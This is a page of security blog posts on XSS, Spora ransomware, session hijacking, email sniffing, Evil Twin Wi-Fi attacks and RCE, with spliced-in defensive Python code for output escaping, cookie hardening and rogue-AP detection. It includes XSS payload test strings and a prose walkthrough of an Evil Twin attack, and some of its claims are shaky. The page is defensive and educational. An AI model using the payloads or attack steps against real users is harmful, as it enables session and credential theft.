Web applications are built using various programming languages, which are used to create different parts of the web application, such as the frontend, the backend, the database, and so on. It is up to the owner of the web application to choose which programming and database languages to use. Many of the programming languages themselves have vulnerabilities that make them unsuitable to be used for the development of a web application, and yet they are used in today's world to create web applications that are used by hundreds of thousands of web users for accomplishing a large number of tasks. Apart from vulnerabilities being present in the programming languages being used, many vulnerabilities get created in a web application when the developers do not use correct programming techniques to code the application. If the developers do not use secure programming techniques, then there is an increased risk of there being exploitable vulnerabilities, such as the cross-site scripting vulnerability, present in the web application. An XSS vulnerability is one in which threat actors harness the power of computer programming scripts to make alterations in a web application and cause damage either to the web application, the user using the web application, or both. Whichever the case, the impact is definitely felt by the owner of the web application as well. Adversaries use their programming and hacking skills to create malicious scripts and inject them into a website that is vulnerable to an XSS attack. The computer scripts could be written in either of the various client-side languages present in the world.

Attackers start by testing their chosen target web applications to first see whether they are even vulnerable to the attack. One way to do this is to check whether a web server replies to a web request containing a script with a response that a web browser can execute; if this test is successful, then the attackers know that the web application is vulnerable to cross-site scripting. After this, the attackers decide on what type of XSS attack they want to use. Basically, there are three main types of XSS attacks, namely stored XSS, reflective XSS and DOM-based XSS, and among these, the most severe one is the stored XSS attack.

In a stored XSS attack, attackers exploit the XSS vulnerability present in a web application by injecting a malicious script into a particular part of the web application so that the script gets stored permanently on the server. An example would be inserting the script in the form of a hyperlink in the comments section on a website by posting an actual comment, which would be visible to everyone visiting that website. After getting the server to store their malicious script, the attackers wait for a victim to go ahead and click on the hyperlink, which then executes the script and the malicious actions that the attacker wanted to happen start occurring. In reflective XSS, the attacker usually fools a victim into navigating to a dangerous URL through which the attacker manages to inject scripts into a dynamically generated web page, such as a search results page, and get full access to whatever is present on that web page. In a DOM-based XSS, attackers take advantage of the issues in the client-side script. One of the ways this attack works is that when attackers inject extra client-side scripts along with the data that is written by an already existing client-side script onto a web page after using the information present in a particular URL request parameter, the additional malicious script that is included by the attackers also gets executed. This is possible if the information is not encoded using HTML entities. An example of this could be when a user clicks on a link on a malicious website to a page that is vulnerable to DOM-based XSS, then an attacker could include malicious code along with the URL request, which would get executed when the data would be interpreted by the web browser of the victim. Reflective and DOM-based XSS usually involve some degree of social engineering; therefore, they are not considered to be of that much use to cyber-criminals.

So, these are some of the ways an XSS attack can be performed by adversaries. This attack can cause significant damage to its victims, and hence, measures should be taken by web application owners and developers to mitigate the risk of any casualties.
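The output encoding, input validation and hyperlink handling that the two XSS posts above recommend (the stored-comment example with a link, and reflected output on a dynamically generated page), as an added Python example rather than the blog's own code; the comment text, the URL and the MAX_COMMENT_LENGTH policy are constructed, and the function names are assumed.

```python
"""Vulnerable HTML rendering beside its hardened form.  Added example; not the blog's code."""
import html
import unicodedata
from urllib.parse import urlsplit

MAX_COMMENT_LENGTH = 500           # assumed site policy
ALLOWED_URL_SCHEMES = {"http", "https"}


def render_comment_unsafe(author: str, text: str) -> str:
    """The vulnerable pattern: untrusted input concatenated straight into the page.
    Whatever the commenter typed (including a <script> element) is stored and served
    to every visitor as markup, which is the stored XSS case described above."""
    return f"<p><b>{author}</b>: {text}</p>"


def render_comment_safe(author: str, text: str) -> str:
    """Output encoding: every user-supplied string is HTML-escaped at the point of
    output, so the browser shows '<script>' as text instead of executing it."""
    return f"<p><b>{html.escape(author)}</b>: {html.escape(text)}</p>"


def validate_comment(text: str) -> bool:
    """Input validation applied before storage: a length limit and no control
    characters other than newline.  Validation narrows input; encoding (above)
    is still required because validation alone cannot know every output context."""
    if not text or len(text) > MAX_COMMENT_LENGTH:
        return False
    return all(ch == "\n" or unicodedata.category(ch)[0] != "C" for ch in text)


def safe_link(url: str, label: str) -> str:
    """Render a user-supplied hyperlink only when it is a plain http(s) URL with a
    host; anything else (javascript:, data:, relative tricks) is shown as text."""
    url = url.strip()
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_URL_SCHEMES or not parts.netloc:
        return html.escape(label)
    href = html.escape(url, quote=True)   # quote=True also escapes " and '
    return f'<a href="{href}" rel="noopener nofollow">{html.escape(label)}</a>'


def render_search_page(query: str) -> str:
    """Reflected case: the query string echoed into a results page, encoded."""
    return f"<h1>Results for: {html.escape(query)}</h1>"


# Constructed inputs of the kind that would be posted to a vulnerable comment form.
HOSTILE_TEXT = "Nice post <script>steal()</script>"
HOSTILE_URL = "javascript:steal()"

if __name__ == "__main__":
    print(render_comment_unsafe("bob", HOSTILE_TEXT))
    print(render_comment_safe("bob", HOSTILE_TEXT))
    print(safe_link(HOSTILE_URL, "click here"))
    print(safe_link("https://example.org/a?b=1&c=2", "example"))
```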


15

June, 2019

Spora Ransomware

Spora, a ransomware-type virus, was first found on 10 January 2017. The malware uses an advanced combination of AES and RSA encryption keys to encrypt users' data. ...
The virus's activity was reduced for a few months, despite its striking appearance and worldwide prevalence. In August, however, researchers warned of the ransomware's return.

Spora ransomware is a data-encrypting Trojan derived from CryLocker. The malware initially communicated with its victims only in Russian, but after several weeks of operation it started spreading all over the world. Mexico, Poland and Sweden are currently the most affected countries. The infection is performed using the close.js file; JavaScript files are popular hacker tools. Surprisingly, it uses a completely different and very complicated data encryption scheme that appears to resist decryption.

The Spora virus apparently creates the .KEY file contents by generating an RSA key and encrypting it with a newly generated AES key. Furthermore, it encrypts that AES key using the public key embedded in the virus executable and saves it to .KEY. The data encryption routine of this malware is somewhat less complicated, because files are encrypted with an AES key that is itself encrypted by the RSA cipher. The JavaScript file extracts an executable with a random name and runs it. The executable then begins to encrypt files with RSA encryption. Note that, unlike other ransomware-type viruses, Spora does not rename encrypted files. A DOCX file is also extracted from the above-mentioned HTA file. This file is corrupt and an error appears once it is opened; this is done to make victims believe that the email attachment download has failed. The ability to work offline (without an Internet connection) is one of Spora's major advantages for its developers. As mentioned above, the files are encrypted using RSA, with the public (encryption) and private (decryption) keys generated during encryption. It is not possible to decrypt without the private key, and the private key is itself encrypted with AES, which aggravates the situation. Besides encrypting files, Spora deactivates Windows Startup Repair, removes shadow volume copies and changes the BootStatusPolicy. The HTML file contains a ransom message in Russian that details the encryption and urges victims to follow the instructions on the Spora website. Victims must pay a ransom for the restoration of their files; the size of the ransom depends on the situation and requirements of the victim.

Full decryption costs approximately $79, including immunity, removal and restoration of files, but victims may choose only restoration, removal or immunity, in which case the price is reduced. Victims are also allowed to decrypt two files free of charge. The ransom must be paid in bitcoins, and victims have a limited time (a time limit for payment is given on the Spora website). Compared to other viruses of the same type, Spora's website is advanced.


Ransomware That Works Offline - Meet Spora Here:

For the encryption process, Spora uses a mixture of symmetric (AES) and asymmetric (RSA) cryptography, with the Windows CryptoAPI used to support encryption on the system. Once Spora runs, the malware creator's public RSA key, embedded in the malware executable, is located and decoded using a hard-coded AES key. Once the malware creator's public RSA key is successfully imported, the malware generates another 1024-bit RSA key pair, which we will call the victim's RSA key pair, consisting of a private and a public key. A new 256-bit AES key for encrypting the victim's private RSA key is also generated. Once the victim's private RSA key is encrypted, the AES key used is itself encrypted using the malware creator's public RSA key. The encrypted key material and certain additional data are then stored within the .KEY file. To encrypt a file or document on the system, Spora creates a new 256-bit AES per-file key. This file key is used to encrypt the first 5 MB of the document. After the malware has done so, the file key is encrypted with the public RSA key, and the RSA-encrypted per-file key is appended to the encrypted document.

Spora is written in C and packed with the UPX executable packer. Unlike most ransomware families, Spora does not rename the files it encrypts, so there are no specific file extensions associated with it. An HTML-based ransom note and a .KEY file are dropped when a system is infected; the base name of the two files is identical to the client ID that the ransomware assigns to each victim. The ransom note is in Russian. A few things stood out immediately: firstly, the presentation and user interface look excellent, and the payment requested seemed relatively small, not at all like other ransomware. Spora focuses mainly on Russian users by sending messages about a 1C receipt, a popular accounting program in Russia and many countries in the U.S.S.


How To Remove Spora Ransomware From Your PC:

Manual removal of threats can be a long and complicated process requiring advanced computer skills. Spyhunter is a tool for the professional automated removal of the Spora virus. Users of Windows XP and Windows 7: start your computer in Safe Mode. Click Start, click Shut Down, click Restart, then click OK. During the computer start process, press the F8 key on your keyboard multiple times until you see the Windows Advanced Options menu, then choose Safe Mode with Networking from the list.

Users of Windows 8: to start Windows 8 in Safe Mode with Networking, go to the Windows 8 Start screen, type Advanced, and select Settings in the search results. Choose Advanced startup options, then select Advanced startup under the opened "General PC Settings" window. Click the "Start now" button. Your computer will now restart into the "Advanced Startup Options" menu. Click the "Troubleshoot" button, then click the "Advanced options" button. On the advanced options screen, click "Startup Settings". Click the "Restart" button. Your PC restarts into the Startup Settings screen. To boot into Safe Mode with Networking, press F5.

Windows 10 users: click the Windows logo and choose the Power icon. While holding the "Shift" key on your keyboard, click "Restart" in the opened menu. Click "Troubleshoot", then select "Advanced options" in the "Troubleshoot" window. Select "Startup Settings" from the advanced options menu and click "Restart". In the following window, press "F5" on your keyboard. This restarts your operating system in Safe Mode with Networking.


15

June, 2019

Please don't hijack my session

Cyber-criminals come up with new tricks and techniques to steal sensitive information from their victims and cause a massive amount of damage to them. There are a lot of cyber-attacks that threat actors could take advantage of to attack their victims. ...
One such attack is a session hijacking attack using which attackers can steal sensitive information from the victims. This blog talks about what a session hijacking attack is and what security controls can be put in place to prevent this type of attack and protect the victims from suffering massive losses.

A session is like a meeting in which two parties exchange information for a certain period of time. Web servers use several pieces of information to keep track of the visitors to the websites they host, and one of the most commonly used methods is cookies. Cookies are pieces of information that a website stores on a user's computer to help the site keep track of that user; the website then does not have to obtain the information about the client again and again, because it reads it from the cookies stored on the user's computer. The type of cookie that tempts cyber-criminals the most is the session cookie, which a website uses to store information about a user's session. For as long as the user's session is valid, the cookie also remains valid, and hence can be used to hijack the user's session. Threat actors can use a session hijacking attack to steal a sensitive session cookie, such as the one set by a banking website when a user logs in to their online banking account. Adversaries can also take advantage of other types of attacks, such as cross-site scripting, session sniffing and other man-in-the-middle attacks, to perform session hijacking.

It is essential to protect against session hijacking attacks because the impact on the targets can be very high. To begin with, website owners need to make sure that the developers who build their websites use secure coding techniques, which reduces the vulnerabilities that arise from the source code and from the implementation of the functions it uses. Sensitive cookies should also be transferred to the client machine and stored on it using secure methods. Most session hijacking attacks involve stealing the session cookie either while the web server is sending it to the client or while it is stored on the victim's computer, so controls are needed against both techniques. Website developers should also implement security controls against the other cyber-attacks that can lead to session hijacking, such as cross-site scripting, session prediction and session sniffing attacks.

Users should always log out of their online accounts when the computer they are using is shared with other users, as you never know what type of websites the other users may visit; they could cause the computer to get infected, which in turn could lead to the theft of session cookies. When a user signs out of their account, the current session cookie is invalidated and hence can no longer be used to hijack the session. Users should also use secure communication channels, such as those protected by SSL or TLS, or use a Virtual Private Network (VPN) to encrypt their network connections.
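The cookie and logout controls described above, as an added example that is not part of the original post: it builds the Set-Cookie header a server would send (Secure so a sniffer on the path never sees the cookie in clear, HttpOnly so page scripts cannot read it) and keeps a server-side session table so that logging out or sitting idle invalidates the session ID, which is what makes a stolen cookie worthless. It is framework-free; the class and function names, the 15-minute idle timeout and the user "alice" are my own assumptions.

```python
"""Hardened session cookies plus server-side session invalidation."""
import secrets
import time
from typing import Callable, Dict, Optional, Tuple

SESSION_TTL_SECONDS = 15 * 60   # idle timeout; a constructed policy value
COOKIE_NAME = "sid"


def build_session_cookie(session_id: str, max_age: int = SESSION_TTL_SECONDS) -> str:
    """Return a Set-Cookie header value for the session cookie.

    Secure   : the browser only sends it over TLS, so a network sniffer
               (the attack the post describes) never sees it in clear.
    HttpOnly : scripts cannot read it via document.cookie, which blunts
               the cookie-stealing cross-site scripting payload.
    SameSite : Strict stops the browser attaching it to cross-site requests.
    """
    return (f"{COOKIE_NAME}={session_id}; Path=/; Max-Age={max_age}; "
            "Secure; HttpOnly; SameSite=Strict")


def cookie_is_hardened(set_cookie_value: str) -> bool:
    """Check a Set-Cookie header for the three attributes that matter here."""
    attrs = {part.strip().split("=")[0].lower()
             for part in set_cookie_value.split(";")[1:]}
    return {"secure", "httponly", "samesite"} <= attrs


class SessionStore:
    """Server-side table of sessions; the cookie carries only an opaque ID."""

    def __init__(self, ttl: int = SESSION_TTL_SECONDS,
                 clock: Callable[[], float] = time.time) -> None:
        self._ttl = ttl
        self._clock = clock          # injectable so the demo can fake time
        self._sessions: Dict[str, Dict[str, object]] = {}

    def login(self, username: str) -> str:
        # A fresh, unguessable 256-bit ID on every login defeats session
        # prediction, and never reusing a pre-login ID defeats fixation.
        sid = secrets.token_urlsafe(32)
        self._sessions[sid] = {"user": username, "last_seen": self._clock()}
        return sid

    def lookup(self, sid: str) -> Optional[str]:
        """Return the username for a valid session, or None."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        now = self._clock()
        if now - float(entry["last_seen"]) > self._ttl:
            # Idle too long: expire server-side so an old cookie is dead.
            del self._sessions[sid]
            return None
        entry["last_seen"] = now
        return str(entry["user"])

    def logout(self, sid: str) -> None:
        # Logout must invalidate server-side, not just clear the browser
        # cookie; otherwise a copy stolen earlier keeps working.
        self._sessions.pop(sid, None)


def demo() -> Tuple[bool, bool, bool]:
    """Login, a replay of the cookie after logout, and idle expiry."""
    fake_clock = [1_000_000.0]
    store = SessionStore(clock=lambda: fake_clock[0])
    sid = store.login("alice")                     # constructed user
    valid_before_logout = store.lookup(sid) == "alice"
    store.logout(sid)
    # Someone replaying the stolen cookie after logout gets nothing.
    valid_after_logout = store.lookup(sid) is not None
    sid2 = store.login("alice")
    fake_clock[0] += SESSION_TTL_SECONDS + 1
    valid_after_idle = store.lookup(sid2) is not None
    return valid_before_logout, valid_after_logout, valid_after_idle


if __name__ == "__main__":
    print(build_session_cookie("example-id"))
    print(demo())
```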

Session hijacking can occur directly or as the result of another cyber-attack, and the severity of its consequences should make it one of the priority attacks from which website owners protect their websites and their users.

Read More

14

June, 2019

Email attacks

There was a time when people did not have the means to communicate with the people living in far off places. People could not talk to their loved ones who lived far away from them. Then, someone came up with the idea of using pigeons or other people to send messages written on paper or a piece of cloth. ...
Surprisingly enough, at that time, even the pigeons used to reach the recipient with the message safe and sound. Over the years, people developed new methods to communicate what they wanted to say to others. The telephone was developed for verbal communication, and postal delivery systems were created to deliver physical mail from one person to another. Postal systems took a lot of time to deliver mail back then (they still do), so many professionals started thinking of new ways to send written messages that could be delivered in the least time possible. When computers were invented, one great person came up with the idea of email, an electronic mail delivery system used to deliver digital mail. Email is still used today, and the technology has undergone several advancements. However, with the progress of email technology, threat actors have also become smarter and have found ways to hack people's email accounts and steal the information shared in the emails that people send or receive. This blog discusses how email systems are vulnerable to being hacked by cyber-criminals and what impact email attacks could have on the victims.

Emails are used by people to share many different types of information. From family photographs and greeting cards to sensitive information, such as online account credentials, information is shared back and forth across the internet using email as the mode of communication. Because email is so widely used, it is a prime target for threat actors. Attackers can use several different types of cyber-attacks to steal information from emails. They can even hack into a user's email account and send bogus emails to the victim's contacts or other people, creating chaos by compromising just a single account. Many email service providers do not use encryption to protect their customers' messages from being read by unauthorised parties, and among those that do, there are cases where the encryption is not implemented correctly, which leaves messages vulnerable to being read by cyber-criminals using certain types of cyber-attack. An adversary could use sniffing attacks to capture email traffic off a network and read the information in the emails.

Let us consider this example. Imagine you have just opened an account with a new bank that has only recently come into existence. You went to your nearest branch and, while opening the account, deposited some money into it. After completing all the formalities, they tell you that you can also access your banking details online via the bank's website using credentials that the bank will send you after 24 hours. You come home in the evening, have dinner, and go to bed. The next day, you check your email and see an email from the bank, but you notice that it has already been opened. You check what is inside and find that the email contains your user credentials for the bank's website, just as the bank told you. You use those credentials to log in to your online banking account, only to find that all the money you had deposited into your new account is gone. It had been transferred to a foreign bank account using the bank's online money transfer service. You report it to the police, and after a while it is found that someone was running a packet sniffer on your network and captured the contents of the email as it was being downloaded to your laptop, on which you had signed in to your email account and not signed out. This was possible for the attacker because neither your email service provider nor the bank's email service provider used any encryption to safeguard the contents of the email. All this cost you your hard-earned money, and there is no way to recover it.

Hackers could also attack the email servers themselves and compromise them to steal information. There are also cases where threat actors compromise several email accounts and use them to send spam to everyone across the internet. Spam tends to fill up victims' email storage, which can cause them to miss important messages, such as one from their bank informing them about an unauthorised transaction.

Emails have become an integral part of people’s everyday lives as almost everyone on this planet uses them to send and receive important information. Therefore, there is a considerable need to prevent email attacks and save people's and organisations’ sensitive information from being stolen by cyber-criminals.

Read More

14

June, 2019

Session hijacking attack

Have you ever tried snatching the phone from a friend of yours while they were talking to someone else, and then started talking to the person on the phone yourself? Well, a lot of you might have done it, and some of you might have not. ...
This blog talks about a certain cyber-attack, which behaves in a similar way but without anybody noticing, and is used by hackers for purposes that are not considered to be good. The type of cyber-attack that is being talked about is a session hijacking attack.

A session is a collection of exchanges that a user makes with a dynamic website or web application during a specific interval of time. Websites use sessions so that they can store information about the client and use it on different pages of the website without having to obtain that information again and again. A session can be compared to a meeting in which two parties exchange information for as long as the meeting lasts, and stop exchanging information when the meeting ends. The validity of a session can be controlled automatically by the web server according to a set time limit, or the user visiting the website can end the session manually by logging out.

Threat actors can use a session hijacking attack to steal sensitive information from targets. This confidential information mostly consists of session cookies, which a website sets on a user's computer. The fact that these cookies are transmitted over the network from the server to the client makes them vulnerable to theft by attackers, and hackers can also steal them while they are stored on the user's computer. Threat actors can use various techniques to perform a session hijacking attack: they can take advantage of other types of cyber-attacks to steal session cookies, or they can exploit vulnerabilities present in the website for this purpose.

One such cyber-attack that threat actors could use as the initial stage of a session hijacking attack is a cross-site scripting attack. The threat actors create special scripts that they embed in a web page that users visit frequently. An example is the comments section of a website, in which the attackers embed the malicious script in the form of a comment. They can insert a link into a comment which, when clicked by unsuspecting users, executes the script, in this case one that helps the attackers steal the victim's session cookie. The attackers can then use the session cookie to hijack the victim's session.

In another type of session hijacking attack, the adversary uses a proxy tool like Burp Suite to intercept the web requests and responses exchanged between the client and the server. When the user logs in to their account, the web server responds with a session cookie. If that session cookie is not adequately secured, the threat actor can easily intercept it using Burp Suite. After intercepting the unsecured session cookie, the attacker injects it into a web URL or an HTTP request and hijacks the authenticated user's web session. The attacker gains access to the victim's authenticated session and, in turn, their online account. With this access, the attacker could pursue other malicious purposes, such as manipulating other people by posing as the owner of the account, or do something else that damages the victim whose session was hijacked or others.

Session hijacking is a very nasty problem to deal with because of the impact it can have on the victims of this type of cyber-attack. Organisations should take proper care when developing their websites and make sure that sensitive information like session cookies remains secure.

Read More

8

June, 2019

Protecting against Evil Twin attacks

Wireless access points are used in homes, offices, hospitals, educational institutions, hotels, airports, and several other places. Threat actors use the flaws present in these access points for their advantage by performing attacks that involve these access points. ...
The attack that we discuss in this blog is the Evil Twin attack, along with the measures that can be taken to prevent it.

The Evil Twin attack is a wireless attack in which threat actors create a fake access point with precisely the same configuration as a legitimate access point, with the intent of stealing sensitive information from the users whose devices connect to the legitimate one. The cyber-criminals use various tools to set up a rogue access point, get the target client devices to connect to it, and then use network traffic sniffing and interception tools to steal the victims' sensitive information, such as account usernames and passwords. Hackers can cause an enormous amount of damage using an Evil Twin attack.

Let us take the example of a hotel on a very busy day in the holiday season. Many thousands of people visit hotels while on vacation at their favourite holiday destinations. While sitting in the lounges or the hotel restaurant, or while in their rooms, most people tend to use the hotel WiFi to access the internet so that they can do some of their business tasks, check their email, or just watch something entertaining. Now, imagine that a threat actor somehow manages to create an Evil Twin of the hotel's wireless access point located on one of the floors, and chooses to attack the users whose devices are connected to that access point. Let's say one of the victims needs to access their online bank account. They use their laptop, which, unknown to them, is connected to the rogue access point created by the adversary. The attacker steals the victim's credentials there and then, and uses them to steal money from the victim's bank account. Many people in that hotel would be making online transactions or accessing some other type of sensitive information, and the attacker could easily and happily steal all that information all day long without anyone noticing, because the hotel is so busy. The Evil Twin attack could turn out to be very evil indeed. However, one should not go down without a fight.

Some security measures can be taken to help protect victims from an Evil Twin attack. One of them lies with the creators of the websites that people visit. Site owners should make sure that their website uses HTTP Strict Transport Security (HSTS), a security mechanism that prevents people from accessing a website if the connection between the client browser and the site is not secure. This is very useful when, for example, the victim of an Evil Twin attack unknowingly browses to a website over a non-SSL connection: if the site uses HSTS, the browser does not allow the victim to access it and shows an error instead. This helps in cases where an attacker uses specific tools to strip the SSL layer from the connection between the client browser and the website.

A precaution that people can take is to use their mobile network connection for accessing the internet whenever they can, which removes the risk of a cyber-criminal creating an Evil Twin of an access point altogether; this is helpful when visiting public places. To add to the security of the connection to a website, a Virtual Private Network (VPN) can be used, which makes it more difficult for the adversary to decrypt the network traffic transmitted over the connection. Another measure is to hide the SSID, or broadcast name, of the legitimate wireless network and only tell it to the people you know who want to connect to it. This helps by keeping the network off the list an attacker sees when they scan for the available networks around them.
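On the detection side, the owner of the legitimate network can spot a twin by comparing what the air shows against an inventory of the access points they actually own. The following is an added example, not code from the original post: it parses constructed scan records and flags an unknown radio MAC (BSSID) advertising our SSID, our SSID offered with the wrong security type, and one BSSID seen on two channels at once; the inventory, the "Hotel-Guest" network, the record format and the function names are my own assumptions.

```python
"""Evil Twin detection by comparing a wireless scan against a known-AP inventory."""
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass(frozen=True)
class AccessPoint:
    ssid: str
    bssid: str      # radio MAC; a twin copies the SSID and often the BSSID too
    channel: int
    security: str   # "WPA2", "OPEN", ...


# Constructed inventory of the legitimate APs, keyed by SSID.
KNOWN_APS: Dict[str, Set[str]] = {
    "Hotel-Guest": {"00:11:22:33:44:01", "00:11:22:33:44:02"},
}
KNOWN_SECURITY: Dict[str, str] = {"Hotel-Guest": "WPA2"}


def parse_scan(lines: List[str]) -> List[AccessPoint]:
    """Parse constructed 'KEY=value' scan records, one AP per line.

    The constructed format has no spaces inside SSIDs; a real scanner's or
    WIDS sensor's output would need its own parser.
    """
    aps: List[AccessPoint] = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        fields = dict(tok.split("=", 1) for tok in line.split())
        aps.append(AccessPoint(fields["SSID"], fields["BSSID"].lower(),
                               int(fields["CH"]), fields["SEC"].upper()))
    return aps


def find_evil_twins(aps: List[AccessPoint]) -> List[str]:
    """Return one finding per suspicious observation (empty list = clean).

    A twin that copies SSID, BSSID, channel and security type looks identical
    to this passive comparison; catching that one needs signal-strength or
    sensor-location data, which this example does not have.
    """
    findings: List[str] = []
    channels_by_bssid: Dict[str, Set[int]] = {}
    for ap in aps:
        if ap.ssid not in KNOWN_APS:
            continue  # somebody else's network; not ours to police
        channels_by_bssid.setdefault(ap.bssid, set()).add(ap.channel)
        if ap.bssid not in KNOWN_APS[ap.ssid]:
            findings.append(
                f"{ap.ssid}: unknown BSSID {ap.bssid} on channel {ap.channel}")
        if ap.security != KNOWN_SECURITY[ap.ssid]:
            # A twin downgraded to OPEN is the classic credential trap.
            findings.append(
                f"{ap.ssid}: {ap.bssid} offers {ap.security}, "
                f"expected {KNOWN_SECURITY[ap.ssid]}")
    for bssid, channels in channels_by_bssid.items():
        if len(channels) > 1:
            # One radio MAC cannot beacon on two channels at once: a clone.
            findings.append(
                f"BSSID {bssid} seen on channels {sorted(channels)} simultaneously")
    return findings


# Constructed scan: our two real APs, a clone that spoofs a real BSSID but
# runs open on another channel, a clone with a fresh BSSID, and a neighbour.
SAMPLE_SCAN = [
    "# constructed records: SSID BSSID CH SEC",
    "SSID=Hotel-Guest BSSID=00:11:22:33:44:01 CH=1 SEC=WPA2",
    "SSID=Hotel-Guest BSSID=00:11:22:33:44:02 CH=6 SEC=WPA2",
    "SSID=Hotel-Guest BSSID=00:11:22:33:44:01 CH=11 SEC=OPEN",
    "SSID=Hotel-Guest BSSID=de:ad:be:ef:00:01 CH=6 SEC=WPA2",
    "SSID=CoffeeShop BSSID=aa:aa:aa:aa:aa:aa CH=3 SEC=OPEN",
]


if __name__ == "__main__":
    for finding in find_evil_twins(parse_scan(SAMPLE_SCAN)):
        print(finding)
```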

Evil Twin attacks are easy to perform but are not so easy to detect. Therefore, a lot of care is necessary to defend against this attack and protect potential victims.

Read More

7

June, 2019

RCE Vulnerability:

Remote code execution is the ability of an attacker to access and make changes to another device, irrespective of the location of that device. ...
Such vulnerabilities may enable an attacker to execute malicious code with the privileges of the running application and take control of the entire system. Once the system has been accessed, attackers often try to escalate their privileges.

It is best to fix a remote code execution vulnerability that allows an attacker to gain access to a computer from a distance as soon as possible. In its monthly Patch Tuesday releases, Microsoft frequently publishes security patches that address remote code execution vulnerabilities.

Usually the developer of the web application does not intend this behaviour. Remote code evaluation can lead to complete compromise of the vulnerable web application and the web server. It is important to note that nearly every programming language has code evaluation features. RCE enables an attacker to take over a computer or server by running arbitrary malicious software (malware). RCE vulnerabilities are among the most dangerous of all kinds, as attackers can run malicious code on vulnerable servers.

One instance of a remote code execution vulnerability is CVE-2018-8248, one of the vulnerabilities addressed in Microsoft's June 12 security update. CVE-2018-8248, also known as the "Microsoft Excel Remote Code Execution Vulnerability", allows an attacker to run malware on vulnerable computers.

New RCE vulnerability impacts nearly half of the internet's email servers:

Exim, an MTA, is software that runs on email servers to relay messages from senders to recipients, and it is affected by the vulnerability. According to a June 2019 survey of all email servers visible on the internet, Exim runs on 57% (507,389) of them, and the number of Exim installations may be ten times higher, around 5.4 million. Qualys, a cyber security company specialising in cloud security and compliance, said in a security alert shared with ZDNet earlier today that Exim installations running versions 4.87 to 4.91 have a very dangerous vulnerability.

Qualys said that a local attacker with a presence on the email server, even with a low-privileged account, can exploit the vulnerability immediately. However, the real risk lies in remote attackers who can scan the web for vulnerable servers and take over systems. Given the complexity of Exim's code, Qualys could not guarantee that this exploitation technique is unique; there may be quicker techniques. The Exim 4.92 release patched the vulnerability on February 10, 2019, but the Exim team did not realise they had fixed a major security hole when they published 4.92. That was found only recently by the Qualys team when the old Exim versions were audited. Now, researchers at Qualys warn Exim users to update to version 4.92 to prevent attackers from taking over their servers. In the same June 2019 email server market share report, only 4.34 percent of all Exim servers run the latest release, 4.92.

Prevention:

For example, the Microsoft Security Update of 12 June 2018 must be installed to prevent remote code execution via the CVE-2018-8248 vulnerability. Had Microsoft's March 2017 security update been applied on time, the remote code execution in the WannaCry cyber-attack, which exploited a Microsoft Windows SMB vulnerability, could have been avoided. The initial attack must be blocked to stop attackers from infecting vulnerable servers with cryptocurrency mining malware; cyber-criminals typically exploit remote code execution vulnerabilities first to launch malware, as the WannaCry attackers did. As a rule, your business must collect, evaluate and act on the latest threat intelligence to minimise risk considerably. Your IT team must be given the best tools for applying patches, which reduces the risk of a data breach. To prevent remote code execution and other cyber-attacks, workstation and server patching can and should be automated.

Read More

7

June, 2019

Evil twin attack

Wireless technologies have made mobile computing a breeze because it has enabled people to perform their tasks from anywhere they want. Be it the library, a subway station, a restaurant, or an airport, wireless networks ...
have made their presence felt by helping people access the internet from wherever they want. People use wireless technologies to do their work, but threat actors use the same technologies to perform malicious activities. This blog discusses a specific type of cyber-attack, the Evil Twin attack, which cyber-criminals can use to attack victims through wireless access points.

An Evil Twin attack is a type of cyber-attack that mainly takes advantage of weaknesses in wireless access points. The main concept behind an Evil Twin attack is to set up a wireless access point that is precisely similar to an existing one at a place the cyber-criminals want to target. By targeting a wireless access point, what threat actors really want is to make the client devices that connect to it their primary targets, through which they intend to steal the sensitive information of the users of those devices. The attackers create a rogue access point with the same configuration as the target access point, such as the SSID (the name of the wireless network that is broadcast to all client devices), the MAC address of the access point and even the channel number on which the target access point operates. There are multiple ways in which Evil Twin attacks can be performed, and many tools that can be used to attack a wireless access point. Tools like Wifite and the Aircrack-ng suite are very easy to use and are a part of every hacker's toolkit.

Going into the details of the Evil Twin attack, the attacker first has to set up their rogue access point appropriately so that it can handle the clients that will connect to it and the network traffic that will flow through it. To do this, the adversaries set up a Dynamic Host Configuration Protocol (DHCP) server on their rogue access point so that the victim devices that connect to it can obtain an IP address for accessing network services. In addition, for the network traffic to be routed properly through the rogue access point to and from the client devices, the attackers also have to set the firewall rules on the evil access point. Finally, the attackers set the name of the access point, the SSID, to be the same as that of the target access point. Once the rogue access point is set up, the attackers use the Airmon-ng tool, which is part of the Aircrack-ng suite, to enable monitor mode on one of the interfaces of the rogue access point so that they can see which client devices are currently connected to their target access point. After turning on monitor mode, the attackers try to deauthenticate the chosen client device from the target access point using another tool. They do this repeatedly until the client device finally connects to the rogue access point created by the adversaries. Once the target client device connects to the fake access point, it gets an IP address and starts accessing the network through the phoney access point.

Now, let's say that the person using the client device that has just connected to the attacker's access point wants to access their online bank account. As they do not know that their device is actually connected to some other access point, they unsuspectingly browse to their bank's website and log in to their online bank account. As soon as they enter their credentials into the input fields and click submit, the credentials flow through the attacker's access point, at which point the attacker intercepts them using a sniffing tool. The victim does not notice what has happened; they still get logged in to their online bank account, which they continue to use as they normally would. The attacker can now either end the attack there and use the stolen credentials to log in to the victim's account themselves, or continue sniffing and intercepting more information. Because the rogue access point created by the cyber-criminals becomes an apparatus for performing malicious activities, it is referred to as the Evil Twin of the target access point.

This type of attack can be hazardous and can become the reason for significant losses as more and more people nowadays use wireless access points to connect their devices to either a local network or the internet. Care should be taken to avoid falling into such traps.

Read More

6

June, 2019

Preventing password attacks

Bing! (Email arrives)
Bob: Hmm. Let me check the email. I wonder what it might be.
Alice: What is it about?
Bob: Oh, no! It is from my bank. They have emailed me to alert me that someone had accessed my online bank account using my username and password yesterday and had made an online funds transfer to a bank account in some other country.
Alice: Woah! Who could have your password?
Bob: I have no idea. ...
Of course, you sure don't want to get into a situation like this one. But it is quite likely that every other person you meet is highly vulnerable to getting into such trouble. This blog talks about the techniques people can use to prevent threat actors from stealing their passwords and accessing their online or local accounts.

A password is a string of characters; it has been around for a very long time and is one of the first methods used for authenticating an entity. Passwords are the "something you know" factor of authentication, one of the 5 commonly used factors of authentication. Keeping passwords safe from snooping eyes is very important, but it can often be difficult.

